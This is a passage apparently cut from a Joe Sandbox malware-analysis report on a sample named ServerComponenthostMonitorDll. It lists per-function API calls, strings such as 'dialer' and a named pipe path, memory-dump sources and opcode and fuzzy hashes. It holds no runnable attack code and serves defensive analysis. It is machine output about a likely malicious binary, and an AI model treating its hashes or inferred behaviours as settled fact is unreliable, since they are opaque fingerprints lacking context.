                                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                • Instruction Fuzzy Hash: B3417F33614B80D7D765CF62E44479AB7A5F389B84F00862AEB8907B28DF38D169CB04
                                                                APIs
                                                                • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 1AFC6A18
                                                                • __scrt_acquire_startup_lock.LIBCMT ref: 1AFC6A6A
                                                                • _RTC_Initialize.LIBCMT ref: 1AFC6A98
                                                                • __scrt_dllmain_after_initialize_c.LIBCMT ref: 1AFC6ABE
                                                                • __scrt_release_startup_lock.LIBCMT ref: 1AFC6AE9
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2257956900.000000001AFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 1AFC0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1afc0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                • String ID:
                                                                • API String ID: 190073905-0
                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                • Instruction ID: 08616be5bff5771810e41af215a24cc1574103d26621d77c899afae118010f7d
                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                • Instruction Fuzzy Hash: 0471367570838786EB91DBA79840B997390FB86B80F84A43ADE484371EFF39E4468711
                                                                APIs
                                                                • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 1AFF7618
                                                                • __scrt_acquire_startup_lock.LIBCMT ref: 1AFF766A
                                                                • _RTC_Initialize.LIBCMT ref: 1AFF7698
                                                                • __scrt_dllmain_after_initialize_c.LIBCMT ref: 1AFF76BE
                                                                • __scrt_release_startup_lock.LIBCMT ref: 1AFF76E9
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                • String ID:
                                                                • API String ID: 190073905-0
                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                • Instruction ID: 1044ea9ab2552314755c48ce0512c73b4eeccab27243a6d5aa2fe174c0dbf682
                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                • Instruction Fuzzy Hash: 8B713837B1078686E7019B6AE88039AF390BB8ABC0F944D26DE08C7736DF78C445C720
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocateFree
                                                                • String ID: dialer
                                                                • API String ID: 576844849-3528709123
                                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                • Instruction ID: ed91161a8005a16116f797edc5cb8ec89ef14eec24b883b7ec4bf0c0a34cfa22
                                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                • Instruction Fuzzy Hash: 91319032B01B5992EB06DF56E8447AA7360FB48BC4F068A219F9807B35EF38D4A5C710
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                • String ID: api-ms-
                                                                • API String ID: 2559590344-2084034818
                                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                • Instruction ID: 3c61772ce37791b8530faad7f1d6fe198cdb7d7ec1b1a0e6afbf6ea37717d329
                                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                • Instruction Fuzzy Hash: 4B31A833312B90A5EE12EB52A88079A7394F74DBA0F574929ED6D87324EF38C049C310
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 1AFF5C4B
                                                                • GetThreadContext.KERNEL32 ref: 1AFF5DB5
                                                                  • Part of subcall function 1AFF5A40: GetCurrentThreadId.KERNEL32 ref: 1AFF5A44
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Thread$Current$Context
                                                                • String ID:
                                                                • API String ID: 1666949209-0
                                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                • Instruction ID: 1c62934dc3beefd1b88ba1a519e92a7e79f2db264a17861db07cec31be9e7f32
                                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                • Instruction Fuzzy Hash: E6C18477209B8886DA60DB1AE49435AB7A0F3C8B88F510616EECD87B79DF3DC541CB10
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                • String ID:
                                                                • API String ID: 517849248-0
                                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                • Instruction ID: 74386dbe5f065cca504906b57c8b7c059f050d32f3c438d5f1c2659ea40192dc
                                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                • Instruction Fuzzy Hash: 01012931304B4196EB16EB12A89879B7361F78CFC0F858436EE8983764DF3CC5898750
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                • String ID:
                                                                • API String ID: 449555515-0
                                                                • Opcode ID: b71df9b9f36b99c12b8c8279b2e48903bf49b55ff0879c355c4554dcd5024c0f
                                                                • Instruction ID: a7b26b99d656dd656d5bc743418072b47c69f7d97a2297e3d4512a7e367f49e9
                                                                • Opcode Fuzzy Hash: b71df9b9f36b99c12b8c8279b2e48903bf49b55ff0879c355c4554dcd5024c0f
                                                                • Instruction Fuzzy Hash: 1A014C7A712B4482EB16AB21E8597AB77A0FB4CFC1F014529EE5907764EF3DC548C710
                                                                APIs
                                                                • __except_validate_context_record.LIBVCRUNTIME ref: 1AFF9103
                                                                • _IsNonwritableInCurrentImage.LIBCMT ref: 1AFF9198
                                                                • RtlUnwindEx.NTDLL ref: 1AFF91E7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                • String ID: csm$f
                                                                • API String ID: 2395640692-629598281
                                                                • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                • Instruction ID: 9395b825a0ce8ce7e1fa8fab778e4d07a426396f79aee946656a9c161a4a2ac8
                                                                • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                • Instruction Fuzzy Hash: F251D0337117859BCB05DF25E8C4B4A37A5F384BD8F528A26EE5A87728EB35D941CB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: CombinePath
                                                                • String ID: \\.\pipe\
                                                                • API String ID: 3422762182-91387939
                                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                • Instruction ID: c078d55963e3a04ce8a65f1ded4ba67ef2dfed88e2b951c695790fde1f534ce0
                                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                • Instruction Fuzzy Hash: 11F03735304B8191EA459B53F9953577721FB4CFD0F089531EE6A47B29DF2CC5858700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: 895874ec98be574f49a17e6780739711aa577a4cf18c9d96cd48b51654f614c3
                                                                • Instruction ID: d23d26e0357854c6115153dadf912b978d31d62f49d11e745f1704658e37ab0b
                                                                • Opcode Fuzzy Hash: 895874ec98be574f49a17e6780739711aa577a4cf18c9d96cd48b51654f614c3
                                                                • Instruction Fuzzy Hash: 04F01271311B4891EF066B60E8D43AB3320EB4CBD1F46241AA50B46575DF28C08CCB10
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 1AFF5236
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread
                                                                • String ID:
                                                                • API String ID: 2882836952-0
                                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                • Instruction ID: 6cc085107ec75e4ca9424dc120b8e2be348fbc457152d408a8d7adabb86d9bd4
                                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                • Instruction Fuzzy Hash: 6FF1C337219B8486DB60CB69F49435ABBA1F3C9B94F104516EA8E87B78DF7DC484CB10
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 2210144848-0
                                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                • Instruction ID: 40aa4ff903744330f2edaee8c2fa784629254d58709edc1a2568f83cd5bd6f1e
                                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                • Instruction Fuzzy Hash: AB71BE32B10A5989FB09DB61D8807EE37A2F78DBD8F444216DE4A63B61EF34C446C310
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 1AFF5806
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread
                                                                • String ID:
                                                                • API String ID: 2882836952-0
                                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                • Instruction ID: 3d0a1403ae7c3b9206d5391266031dee7c48bea286cd24c0401ebfab9399fd3c
                                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                • Instruction Fuzzy Hash: 9651B837519B84C6E760DB25E49431AB7A0F388B94F501A16FA8D87B78DB7DC550CF10
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2257956900.000000001AFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 1AFC0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1afc0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: _set_statfp
                                                                • String ID:
                                                                • API String ID: 1156100317-0
                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                • Instruction ID: 00372e06b6dd7c29ee0b4a04b24c8c146455c49f1c68028acbf89a09e1cc6c93
                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                • Instruction Fuzzy Hash: 3201F5B7E54F8601E79721A5E5513592001AF48374F8E4735EB7B4BBFACB288C42821C
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: _set_statfp
                                                                • String ID:
                                                                • API String ID: 1156100317-0
                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                • Instruction ID: e9f6ef2b57b3daf5baebc7fa9801b4113568a50323f6cef205e881a77af6d835
                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                • Instruction Fuzzy Hash: 5801C036E58A4106FB4CC166E4523FA1082BBA83F4F044634FBBB073E99F688D828200
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                • String ID:
                                                                • API String ID: 3230265001-0
                                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                • Instruction ID: ad9a0000b1400e51261b07cb8ef60db004995abf9bd171093cce95dedc1f5310
                                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                • Instruction Fuzzy Hash: DB118832714B8086E312AB56E89439BB3A0F78CFE4F004224FE5E877A4DF78C5548740
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                • String ID:
                                                                • API String ID: 1092925422-0
                                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                • Instruction ID: fbb0a64c3be4e1a1e77d9f1debb6959853c7d2472080ae9ffa1c8c18103186cf
                                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                • Instruction Fuzzy Hash: 47115B3A705B4082EB169B21F4543AA7775FB8CB84F05452AEE9907764EF3DC549C700
                                                                APIs
                                                                • __except_validate_context_record.LIBVCRUNTIME ref: 1AFC8503
                                                                • _IsNonwritableInCurrentImage.LIBCMT ref: 1AFC8598
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2257956900.000000001AFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 1AFC0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1afc0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                • String ID: csm$f
                                                                • API String ID: 3242871069-629598281
                                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                • Instruction ID: 4550b125a84a6f10fd6639f869e2a5c45b67c93992cce3ac7796fb9992cd696e
                                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                • Instruction Fuzzy Hash: 3451B9367127828BC706CF26E844F493365F780BB8F528625DA4A4770CFB75D881DB90
                                                                APIs
                                                                • __except_validate_context_record.LIBVCRUNTIME ref: 1AFC8503
                                                                • _IsNonwritableInCurrentImage.LIBCMT ref: 1AFC8598
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2257956900.000000001AFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 1AFC0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1afc0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                • String ID: csm$f
                                                                • API String ID: 3242871069-629598281
                                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                • Instruction ID: e197e0e5e3b759a41a337560383358db5c7f1766cff00c4eaf004108318bb2e0
                                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                • Instruction Fuzzy Hash: 0E31BD7631278296C712CF12E884B593764F740BF8F468528EE5B07B08EF79D942C799
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocateFree
                                                                • String ID:
                                                                • API String ID: 576844849-0
                                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                • Instruction ID: d027bc2b72bd0fbc160723733d7a32ae6dc418fbdeb621ab9bd257eb2e2b501e
                                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                • Instruction Fuzzy Hash: FB219D37605B8482EB129F6AE40039AF7A0FB8DBD4F454521EF8C57B28EF78D1468704
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Heap$AllocateProcess
                                                                • String ID:
                                                                • API String ID: 1357844191-0
                                                                • Opcode ID: 78f367cf2972e53aaf30a64ce9c1d2c2ef884996b14bb2d1d261e709463e9945
                                                                • Instruction ID: d0e1c68d5f4f43a4896e4dcd2add880bc6b1f88db210939c876e9e31124db137
                                                                • Opcode Fuzzy Hash: 78f367cf2972e53aaf30a64ce9c1d2c2ef884996b14bb2d1d261e709463e9945
                                                                • Instruction Fuzzy Hash: 1CE0E571A11A0086E70AAFA6D8593DB77E1FB8CF91F49C024C94907360DF7D849ACB90
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Heap$AllocateProcess
                                                                • String ID:
                                                                • API String ID: 1357844191-0
                                                                • Opcode ID: 1c4068ecb2edea308d344461d97e3b92801a938b6310884c78818bc30094bcd9
                                                                • Instruction ID: 900518bd4cd14378d85ae4fbf7c3055629b5814e7e9741139bdda6d5019fbde1
                                                                • Opcode Fuzzy Hash: 1c4068ecb2edea308d344461d97e3b92801a938b6310884c78818bc30094bcd9
                                                                • Instruction Fuzzy Hash: 9EE01AB1621A00C7E70AAF66D8453DB77E1FB8CF91F888024C90907320EF3C8499CB10
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastWrite
                                                                • String ID: U
                                                                • API String ID: 442123175-4171548499
                                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                • Instruction ID: 46a53bccb86a3f687450528e5d1439826b2779f8048973f9f38ca8feafb85d2f
                                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
